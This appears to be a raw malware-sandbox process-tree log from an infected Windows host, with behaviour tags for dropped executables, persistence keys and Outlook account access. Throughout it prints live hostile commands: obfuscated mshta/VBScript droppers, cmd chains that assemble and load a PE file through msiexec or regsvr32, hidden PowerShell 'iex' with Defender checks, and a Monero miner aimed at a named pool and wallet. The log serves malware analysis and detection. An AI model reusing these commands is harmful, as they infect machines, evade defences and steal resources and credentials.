C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Roaming\3392017.exe"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If """" == """" for %T IN (""C:\Users\Admin\AppData\Roaming\3392017.exe"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )10⤵PID:5492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Roaming\3392017.exe" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "" =="" for %T IN ("C:\Users\Admin\AppData\Roaming\3392017.exe") do taskkill -iM "%~nxT" -f11⤵PID:7232
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "3392017.exe" -f12⤵
- Kills process with taskkill
PID:3472
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\1462013.exe"C:\Users\Admin\AppData\Roaming\1462013.exe"9⤵
- Adds Run key to start application
PID:2032 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"10⤵PID:7224
-
-
-
C:\Users\Admin\AppData\Roaming\5295647.exe"C:\Users\Admin\AppData\Roaming\5295647.exe"9⤵PID:5428
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵PID:1512
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"8⤵
- Executes dropped EXE
PID:3956 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 2969⤵
- Program crash
- Enumerates system info in registry
PID:6076
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"8⤵
- Executes dropped EXE
PID:6020 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6020 -s 17129⤵
- Program crash
PID:4220
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"8⤵PID:6520
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵PID:7020
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵PID:5348
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:6780
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵PID:7128
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵PID:7728
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵PID:7556
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵PID:6004
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵PID:3956
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵PID:5668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵PID:5124
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
- Loads dropped DLL
PID:7776
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
PID:3732
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵PID:4040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 6129⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1652
-
-
-
C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"8⤵PID:7156
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵
- Loads dropped DLL
PID:5812 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
PID:1604 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"10⤵
- Loads dropped DLL
PID:11140
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"8⤵PID:1900
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1900 -s 22609⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2676
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1900 -s 22609⤵
- Program crash
PID:1788
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe5⤵PID:784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe5⤵PID:4108
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exeSun03f5d51697d04.exe6⤵
- Executes dropped EXE
PID:2132 -
C:\Users\Admin\AppData\Local\Temp\is-1CHD0.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-1CHD0.tmp\Sun03f5d51697d04.tmp" /SL5="$8002A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3504 -
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exe"C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exe" /SILENT8⤵
- Executes dropped EXE
PID:5192 -
C:\Users\Admin\AppData\Local\Temp\is-OJ03F.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-OJ03F.tmp\Sun03f5d51697d04.tmp" /SL5="$4015C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exe" /SILENT9⤵PID:5312
-
C:\Users\Admin\AppData\Local\Temp\is-SO44T.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-SO44T.tmp\postback.exe" ss110⤵
- Executes dropped EXE
PID:1652
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0351a0558292.exe5⤵PID:808
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0351a0558292.exeSun0351a0558292.exe6⤵
- Executes dropped EXE
PID:3132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe5⤵PID:2916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe5⤵PID:924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe5⤵PID:2992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe5⤵PID:4120
-
-
-
-
-
C:\Windows\SysWOW64\control.exe"C:\Windows\SysWOW64\control.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:3940 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\dyEvj3hC2t7OMuwoWXdKUmK3.exe"3⤵PID:1408
-
-
-
C:\Windows\SysWOW64\colorcpl.exe"C:\Windows\SysWOW64\colorcpl.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5312
-
-
C:\Users\Admin\AppData\Local\Temp\E26D.exeC:\Users\Admin\AppData\Local\Temp\E26D.exe2⤵
- Suspicious use of SetThreadContext
PID:8 -
C:\Users\Admin\AppData\Local\Temp\E26D.exeC:\Users\Admin\AppData\Local\Temp\E26D.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1440
-
-
-
C:\Users\Admin\AppData\Local\Temp\6A4B.exeC:\Users\Admin\AppData\Local\Temp\6A4B.exe2⤵PID:6228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6228 -s 2723⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6908
-
-
-
C:\Users\Admin\AppData\Local\Temp\B9C4.exeC:\Users\Admin\AppData\Local\Temp\B9C4.exe2⤵PID:5704
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX7\mannishly.bat" "3⤵PID:5584
-
C:\Users\Admin\AppData\Local\Temp\RarSFX7\bifurcation.exebifurcation.exe -p"xicyqwllwklawixvurbiyphwsjuxiq"4⤵PID:4040
-
C:\Users\Admin\AppData\Local\Temp\RarSFX8\beadroll.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX8\beadroll.exe"5⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:5280 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"6⤵PID:8160
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 19286⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3988
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 19286⤵
- Program crash
PID:8008
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DB08.exeC:\Users\Admin\AppData\Local\Temp\DB08.exe2⤵PID:4228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 2363⤵
- Program crash
- Enumerates system info in registry
PID:7944
-
-
-
C:\Users\Admin\AppData\Local\Temp\3176.exeC:\Users\Admin\AppData\Local\Temp\3176.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:7068 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7068 -s 3963⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4008
-
-
-
C:\Users\Admin\AppData\Local\Temp\7AD5.exeC:\Users\Admin\AppData\Local\Temp\7AD5.exe2⤵PID:6252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:932
-
-
-
C:\Users\Admin\AppData\Local\Temp\BAEC.exeC:\Users\Admin\AppData\Local\Temp\BAEC.exe2⤵
- Suspicious use of SetThreadContext
PID:6664 -
C:\Users\Admin\AppData\Local\Temp\BAEC.exeC:\Users\Admin\AppData\Local\Temp\BAEC.exe3⤵PID:7748
-
-
-
C:\Users\Admin\AppData\Local\Temp\6A96.exeC:\Users\Admin\AppData\Local\Temp\6A96.exe2⤵PID:6084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6324
-
-
-
C:\Users\Admin\AppData\Local\Temp\C866.exeC:\Users\Admin\AppData\Local\Temp\C866.exe2⤵PID:3720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3720 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5564
-
-
-
C:\Program Files (x86)\Mrbnhc\xfatghhxptwtr.exe"C:\Program Files (x86)\Mrbnhc\xfatghhxptwtr.exe"2⤵PID:49580
-
-
C:\Users\Admin\AppData\Local\Temp\37F1.exeC:\Users\Admin\AppData\Local\Temp\37F1.exe2⤵PID:14860
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\hosts.bat" "3⤵PID:14980
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:15060 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend5⤵PID:16408
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"5⤵PID:16608
-
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups5⤵PID:17080
-
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller5⤵PID:17444
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\hosts.bat" "3⤵PID:15016
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:15152 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend5⤵PID:16448
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"5⤵PID:16596
-
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups5⤵PID:17056
-
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller5⤵PID:17328
-
-
-
-
C:\Users\Admin\AppData\Roaming\fontdrvhost.exe"C:\Users\Admin\AppData\Roaming\fontdrvhost.exe"3⤵PID:15296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15296 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:17224
-
-
-
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"3⤵
- Suspicious use of SetThreadContext
PID:15384 -
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:17280 -
C:\Users\Admin\AppData\Local\Temp\QUKHyXjH3qRKVkqx.exe"C:\Users\Admin\AppData\Local\Temp\QUKHyXjH3qRKVkqx.exe"5⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
PID:20680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com6⤵PID:51288
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 49YaCLR6euq4TAt1Nj42ZeHFmJGdFGJspjjfpWNUaw7jb6L14vAvMZSh27tmKVBivE657AgHGP8XcKVv92D7vtVfQG2ckXx.RIG1 -p x --algo rx/06⤵PID:23908
-
-
-
C:\Users\Admin\AppData\Local\Temp\QUKHyXjH3qRKVkqx.exe"C:\Users\Admin\AppData\Local\Temp\QUKHyXjH3qRKVkqx.exe"5⤵PID:20672
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com6⤵PID:51304
-
-
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\a4755c5f\plg\7w7FkvGJ.json"5⤵
- Suspicious use of SetThreadContext
PID:52096 -
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"6⤵
- Accesses Microsoft Outlook accounts
PID:52200
-
-
-
C:\Users\Admin\AppData\Local\Temp\lp4ZRyw0RpGtlIBV.exe"C:\Users\Admin\AppData\Local\Temp\lp4ZRyw0RpGtlIBV.exe"5⤵PID:7680
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com6⤵PID:10668
-
-
-
C:\Users\Admin\AppData\Local\Temp\lp4ZRyw0RpGtlIBV.exe"C:\Users\Admin\AppData\Local\Temp\lp4ZRyw0RpGtlIBV.exe"5⤵PID:11236
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com6⤵PID:10188
-
-
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\a4755c5f\plg\lp4ZRyw0.json"5⤵PID:11444
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"6⤵PID:10260
-
-
-
C:\Users\Admin\AppData\Local\Temp\AbcatT5YrtyGV4Gv.exe"C:\Users\Admin\AppData\Local\Temp\AbcatT5YrtyGV4Gv.exe"5⤵PID:39228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 39228 -s 2566⤵PID:42220
-
-
-
C:\Users\Admin\AppData\Local\Temp\AbcatT5YrtyGV4Gv.exe"C:\Users\Admin\AppData\Local\Temp\AbcatT5YrtyGV4Gv.exe"5⤵PID:40452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 40452 -s 2926⤵
- Program crash
PID:41916
-
-
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\a4755c5f\plg\7F0zW8sl.json"5⤵PID:39264
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"6⤵PID:40756
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D7FA.exeC:\Users\Admin\AppData\Local\Temp\D7FA.exe2⤵PID:13208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13208 -s 2883⤵PID:41892
-
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe dcd4e2d229e6a204038c8ed072934241 t3kpkbwC006FvUI4chaFNw.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:4880
-
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:30344
-
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:39320
-
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:47192
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f0dc4460bc9.exeSun03f0dc4460bc9.exe1⤵
- Executes dropped EXE
PID:4708 -
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f0dc4460bc9.exeC:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f0dc4460bc9.exe2⤵
- Executes dropped EXE
PID:1064 -
C:\Users\Admin\AppData\Local\Temp\mk.exe"C:\Users\Admin\AppData\Local\Temp\mk.exe"3⤵PID:2856
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0328255c4bce6fb.exeSun0328255c4bce6fb.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3652 -
C:\ProgramData\1907429.exe"C:\ProgramData\1907429.exe"2⤵
- Executes dropped EXE
PID:5580
-
-
C:\ProgramData\6722478.exe"C:\ProgramData\6722478.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5924
-
-
C:\ProgramData\3782043.exe"C:\ProgramData\3782043.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4264
-
-
C:\ProgramData\4844256.exe"C:\ProgramData\4844256.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:852
-
-
C:\ProgramData\263405.exe"C:\ProgramData\263405.exe"2⤵PID:1616
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\ProgramData\263405.exe"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If """" == """" for %T IN (""C:\ProgramData\263405.exe"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )3⤵PID:6004
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R copY /Y "C:\ProgramData\263405.exe" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "" =="" for %T IN ("C:\ProgramData\263405.exe") do taskkill -iM "%~nxT" -f4⤵PID:6500
-
C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq5⤵PID:6868
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If ""/PrWIGG7qbcjwuF1awT~BmZfq "" == """" for %T IN (""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )6⤵
- Blocklisted process makes network request
PID:3652 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "/PrWIGG7qbcjwuF1awT~BmZfq " =="" for %T IN ("C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE") do taskkill -iM "%~nxT" -f7⤵PID:1668
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIPt: cLoSE ( cReatEOBJECT( "wscRIPt.shell" ). rUn ("CMd /c ecHO | SeT /P = ""MZ"" >STBAQR.mZ &CoPy /b /y StbAQR.mZ +NNIZo8.S+ _7Ijs.BLD + GX3VA2JI.W+ JGSZHKM.HL + XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u &del /Q *" ,0 ,tRUE))6⤵PID:6848
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ecHO | SeT /P = "MZ" >STBAQR.mZ &CoPy /b /y StbAQR.mZ +NNIZo8.S+ _7Ijs.BLD + GX3VA2JI.W+ JGSZHKM.HL +XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u &del /Q *7⤵PID:5788
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>STBAQR.mZ"8⤵PID:3500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO "8⤵PID:1016
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s ..\WAvZq~GT.C /u8⤵
- Loads dropped DLL
PID:6768
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "263405.exe" -f5⤵
- Kills process with taskkill
PID:6920
-
-
-
-
-
C:\ProgramData\4990988.exe"C:\ProgramData\4990988.exe"2⤵
- Executes dropped EXE
PID:5864
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun038db98f99bf9a.exeSun038db98f99bf9a.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1456 -
C:\Users\Admin\Pictures\Adobe Films\qQbVMM4g0bpXElDCk7u81Gef.exe"C:\Users\Admin\Pictures\Adobe Films\qQbVMM4g0bpXElDCk7u81Gef.exe"2⤵
- Executes dropped EXE
PID:5816
-
-
C:\Users\Admin\Pictures\Adobe Films\mXtIGk3ofwNa4d7r1RCLpLFz.exe"C:\Users\Admin\Pictures\Adobe Films\mXtIGk3ofwNa4d7r1RCLpLFz.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5064 -
C:\Users\Admin\Documents\RIIYmTjLPmSKrYWy3rHDnAMz.exe"C:\Users\Admin\Documents\RIIYmTjLPmSKrYWy3rHDnAMz.exe"3⤵PID:7112
-
